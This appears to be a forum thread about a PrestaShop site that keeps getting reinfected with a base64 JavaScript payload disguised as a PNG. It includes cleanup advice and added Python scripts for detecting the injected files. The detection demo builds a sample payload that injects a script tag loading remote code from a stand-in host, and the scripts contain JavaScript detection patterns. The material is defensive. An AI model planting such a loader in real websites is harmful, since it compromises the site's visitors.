Prestashop 1.7.5.1 vulnerabilities still present - where do those come from?


heyciao

Hi everyone,

PrestaShop 1.7.5.1, PHP 7.3

I am in the process of migrating to PrestaShop 8.2, PHP 8.x and a MySQL upgrade.

In the meantime, I have an issue with the website that is still running until the migration is completed.

I have found out that a PNG image, usually something like GbhdU.png, appears in the /img directory, arriving from nowhere.

And in /classes/controller, FrontController.php and Controller.php get injected with some code: a function called jscheck($html,$p), where $p, at the end of the story, is exactly that image, which is in fact JavaScript code encoded in base64.

Yes, I have simply opened that PNG with Notepad and base64-decoded it.

And that is fine; I have searched the net, fixed the modules and upgrades, deleted the modules I do not use. I think I have done everything.

Some MySQL cleaning too (changed passwords, of course, first thing).

I must say that the site is now really fast; the back end is really fast. That experience forced me to deep-clean the site, and I discovered that PrestaShop was not heavy and dramatically slow, even in back-end operations, because of the old version, old PHP, old things.

It can run really fast and perform really well. It was a ton of dirty injected code, and now it is clean.

I know how to clean it.

But here is the BIG question:

How does it happen that every day, at a random hour, that PNG image/code appears again in /img and the two files get injected again and again?

I check, go clean it, everything is right; after 8-12 hours, it happens again.

Where does this come from? I have checked the logs to see if there is some POST with strange URLs, some injections.

I am not able to find the hole, the starting point.

I have compared all the files in all directories. I have updated all the modules.

I have deleted all the phpunit folders. Installed all the modules that check for vulnerabilities.

Is it a bot? Is it a trigger coming from some SQL injected into some table?

It would be great to end this journey with the last discovery: the origin.

Thanks to anyone who gets interested and helps.

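The two indicators heyciao describes (a file named like a PNG in /img whose content is really base64-encoded JavaScript, and a jscheck() function injected into the controller classes) can be hunted for mechanically. The script below is an added example for this thread, not code from the post or from PrestaShop: it checks every *.png under img/ for the PNG signature, tries to base64-decode the ones that lack it, and greps PHP files for the injected function name. The demo tree it builds (the file names GbhdU.png and FrontController.php, the JavaScript payload and the list of keywords used to recognise JavaScript) is constructed for illustration.

```python
"""Hunt for the indicators described in the post: a fake PNG under img/ that
is base64-encoded JavaScript, and a jscheck() function injected into PHP."""
import base64
import os
import re
import tempfile
from typing import Dict, List, Optional

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"  # first 8 bytes of every genuine PNG file
# Tokens a decoded payload should contain before it is reported as JavaScript
# (constructed list; extend it to taste).
JS_HINTS = re.compile(rb"(document\.|window\.|eval\(|atob\(|<script|function\s*\()", re.I)


def decode_if_base64(data: bytes) -> Optional[bytes]:
    """Return the decoded bytes if data is a base64 blob, otherwise None."""
    stripped = b"".join(data.split())  # tolerate line breaks inside the blob
    if not stripped or len(stripped) % 4 or not re.fullmatch(rb"[A-Za-z0-9+/]+=*", stripped):
        return None
    try:
        return base64.b64decode(stripped, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def scan_fake_pngs(img_dir: str) -> List[Dict[str, str]]:
    """*.png files that lack the PNG signature and decode to JavaScript-like text."""
    findings = []
    for name in sorted(os.listdir(img_dir)):
        path = os.path.join(img_dir, name)
        if not name.lower().endswith(".png") or not os.path.isfile(path):
            continue
        with open(path, "rb") as fh:
            data = fh.read()
        if data.startswith(PNG_MAGIC):
            continue  # a real PNG, at least by its header
        decoded = decode_if_base64(data)
        if decoded is not None and JS_HINTS.search(decoded):
            findings.append({"path": path, "preview": decoded[:60].decode("utf-8", "replace")})
    return findings


def find_injected_function(root: str, func_name: str = "jscheck") -> List[str]:
    """PHP files under root that define or call func_name (the name the post reports)."""
    pattern = re.compile(rb"\b" + re.escape(func_name.encode()) + rb"\s*\(")
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if not fname.endswith(".php"):
                continue
            path = os.path.join(dirpath, fname)
            with open(path, "rb") as fh:
                if pattern.search(fh.read()):
                    hits.append(path)
    return sorted(hits)


def build_demo_tree() -> str:
    """Constructed sample install: a real-looking PNG, a fake PNG carrying
    base64 JavaScript, one clean controller and one injected controller."""
    root = tempfile.mkdtemp(prefix="ps_scan_")
    os.makedirs(os.path.join(root, "img"))
    os.makedirs(os.path.join(root, "classes", "controller"))
    with open(os.path.join(root, "img", "logo.png"), "wb") as fh:
        fh.write(PNG_MAGIC + b"\x00" * 16)
    payload = b"var s=document.createElement('script');s.src='//example.invalid/x.js';document.head.appendChild(s);"
    with open(os.path.join(root, "img", "GbhdU.png"), "wb") as fh:
        fh.write(base64.b64encode(payload))  # the "image" is just base64 text
    with open(os.path.join(root, "classes", "controller", "Controller.php"), "wb") as fh:
        fh.write(b"<?php\nabstract class ControllerCore {}\n")
    with open(os.path.join(root, "classes", "controller", "FrontController.php"), "wb") as fh:
        fh.write(b"<?php\nfunction jscheck($html,$p){ /* injected */ }\nclass FrontControllerCore {}\n")
    return root


if __name__ == "__main__":
    root = build_demo_tree()  # point this at the real install instead
    for f in scan_fake_pngs(os.path.join(root, "img")):
        print("fake PNG:", f["path"], "->", f["preview"])
    for p in find_injected_function(root):
        print("injected function in:", p)
```

Run it against the live install on a schedule (cron every hour is enough, given the 8-12 hour re-infection the post describes) and keep the output: the timestamp of the first reappearance, cross-referenced with the web server access log for that minute, is usually the quickest route to the request that does the writing. The script only finds the artifacts; it says nothing about the hole they came through.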

5 months later...

For those who may have a similar problem

I encountered a similar problem with PS 1.7.6.1, and it wasted more than six days of my life trying to solve it. Here is the solution to this problem:

First, you need to delete lines 43 to 46 of the file "smarty.config.inc.php". Then delete the "js" folder and replace it with a clean one, as this folder contains the Chopper.GG!dha backdoor.

After that, check the list of files below with their corresponding file sizes. If you see that your file sizes are larger than the listed ones, you need to replace them with clean copies.

(paths relative to public_html)

classes/Tools.php                          143.14 KB

classes/Dispatcher.php                      42.78 KB

classes/controller/Controller.php           21.55 KB

classes/controller/FrontController.php      69.01 KB

classes/controller/ModuleFrontController.php 3.65 KB

classes/shop/Shop.php                       43.11 KB

controllers/front/IndexController.php        1.42 KB

classes/PrestaShopAutoload.php              12.56 KB

classes/Store.php                            6.32 KB

classes/Hook.php                            34.31 KB

classes/Product.php                        263.08 KB

config/config.inc.php                        9.80 KB

config/smarty.config.inc.php                 6.40 KB  (after deleting lines 43 to 46)

classes/db/Db.php                           25.58 KB

controllers/admin/AdminLoginController.php  18.83 KB

And finally, you can also set the permissions of the above-listed files to 444.

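The reply's procedure (compare core file sizes against a known-good list, replace anything larger, chmod the result to 444) can be scripted, and it is worth pairing it with a stronger check, because an injection that replaces bytes rather than appending them leaves the size unchanged. The script below is an added example, not code from the reply or from PrestaShop. It assumes the "KB" figures mean 1024-byte units and allows 0.01 KB of rounding slack; the EXPECTED_KB table should be filled from a clean copy of your own version rather than copied from the list above. The demo trees, file sizes and the file names in them are constructed for illustration.

```python
"""Size-based integrity check as in the reply, plus a hash diff against a
clean copy of the same version, and a helper to make the files read-only."""
import hashlib
import os
import tempfile
from typing import Dict, List, Optional, Tuple

# Known-good sizes in KB. Assumed 1024-byte units; measure these yourself
# from a clean copy of the exact version you run (constructed demo values).
DEMO_EXPECTED_KB = {"classes/Tools.php": 2.00, "classes/Hook.php": 1.00}


def size_kb(path: str) -> float:
    return round(os.path.getsize(path) / 1024, 2)


def oversized_files(root: str, expected: Dict[str, float],
                    tolerance_kb: float = 0.01) -> List[Tuple[str, Optional[float], float]]:
    """(relpath, actual_kb, expected_kb) for listed files that are larger than
    expected; a missing file is reported with actual_kb = None."""
    out = []
    for rel, exp in expected.items():
        path = os.path.join(root, rel)
        if not os.path.isfile(path):
            out.append((rel, None, exp))
        elif size_kb(path) > exp + tolerance_kb:
            out.append((rel, size_kb(path), exp))
    return out


def sha256_file(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def diff_against_clean(live_root: str, clean_root: str) -> Tuple[List[str], List[str]]:
    """Files that differ from, or are absent in, a clean copy of the same
    version. Catches same-size edits and dropped files (the fake PNG)."""
    changed, extra = [], []
    for dirpath, _dirs, files in os.walk(live_root):
        for f in files:
            live = os.path.join(dirpath, f)
            rel = os.path.relpath(live, live_root).replace(os.sep, "/")
            clean = os.path.join(clean_root, rel)
            if not os.path.isfile(clean):
                extra.append(rel)
            elif sha256_file(live) != sha256_file(clean):
                changed.append(rel)
    return sorted(changed), sorted(extra)


def make_read_only(root: str, rels: List[str]) -> Dict[str, str]:
    """chmod 444 each listed file; returns the resulting mode bits per file."""
    modes = {}
    for rel in rels:
        path = os.path.join(root, rel)
        os.chmod(path, 0o444)
        modes[rel] = oct(os.stat(path).st_mode & 0o777)[2:]
    return modes


def _write(root: str, rel: str, data: bytes) -> None:
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as fh:
        fh.write(data)


def build_demo_trees() -> Tuple[str, str]:
    """Constructed live and clean trees: Tools.php has 300 injected bytes
    (caught by size), Hook.php has a one-byte edit at the same size (caught
    only by hash), and the live tree carries an extra fake PNG."""
    live = tempfile.mkdtemp(prefix="ps_live_")
    clean = tempfile.mkdtemp(prefix="ps_clean_")
    _write(clean, "classes/Tools.php", b"a" * 2048)
    _write(live, "classes/Tools.php", b"a" * 2048 + b"x" * 300)
    _write(clean, "classes/Hook.php", b"h" * 1024)
    _write(live, "classes/Hook.php", b"h" * 1023 + b"X")
    _write(live, "img/GbhdU.png", b"dmFyIHg9MTs=")
    return live, clean


if __name__ == "__main__":
    live, clean = build_demo_trees()  # use the real docroot and a fresh unpack
    print("oversized:", oversized_files(live, DEMO_EXPECTED_KB))
    print("changed/extra:", diff_against_clean(live, clean))
    print("modes:", make_read_only(live, list(DEMO_EXPECTED_KB)))
```

Two caveats on the 444 step: chmod only slows an attacker down if the PHP process does not own the files, because the owner can chmod them back, and a read-only core does nothing about the write path that keeps reinstalling the files, which is the question the thread opens with.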